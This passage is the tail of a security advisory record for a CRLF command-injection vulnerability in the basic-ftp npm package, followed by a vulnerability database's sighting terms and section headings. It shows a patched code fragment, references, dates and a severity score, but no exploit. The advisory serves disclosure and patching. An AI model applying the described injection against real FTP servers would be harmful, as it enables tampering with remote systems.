characters\u0027);\n    }\n    if (!path.startsWith(\" \")) {\n        return path;\n    }\n    const pwd = await this.pwd();\n    const absolutePathPrefix = pwd.endsWith(\"/\") ? pwd : pwd + \"/\";\n    return absolutePathPrefix + path;\n}\n```\n\n## References\n\n- [npm package: basic-ftp](https://www.npmjs.com/package/basic-ftp)\n- [GitHub repository](https://github.com/patrickjuchli/basic-ftp)\n- [Vulnerable source: Client.js protectWhitespace()](https://github.com/patrickjuchli/basic-ftp/blob/master/src/Client.ts)\n- [Vulnerable source: FtpContext.js send()](https://github.com/patrickjuchli/basic-ftp/blob/master/src/FtpContext.ts)\n- [CWE-93: Improper Neutralization of CRLF Sequences](https://cwe.mitre.org/data/definitions/93.html)\n- [OWASP: CRLF Injection](https://owasp.org/www-community/vulnerabilities/CRLF_Injection)",
  "id": "GHSA-chqc-8p9q-pq6q",
  "modified": "2026-04-09T19:06:10Z",
  "published": "2026-04-08T20:02:25Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/patrickjuchli/basic-ftp/security/advisories/GHSA-chqc-8p9q-pq6q"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39983"
    },
    {
      "type": "WEB",
      "url": "https://github.com/patrickjuchli/basic-ftp/commit/2ecc8e2c500c5234115f06fd1dbde1aa03d70f4b"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/patrickjuchli/basic-ftp"
    },
    {
      "type": "WEB",
      "url": "https://github.com/patrickjuchli/basic-ftp/releases/tag/v5.2.1"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "basic-ftp has FTP Command Injection via CRLF"
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-39983 (GCVE-0-2026-39983)

FKIE_CVE-2026-39983

GHSA-CHQC-8P9Q-PQ6Q

Summary

Affected product

Vulnerability details

Technical impact

Proof of concept

Mitigation

References

Tags

Sightings

Nomenclature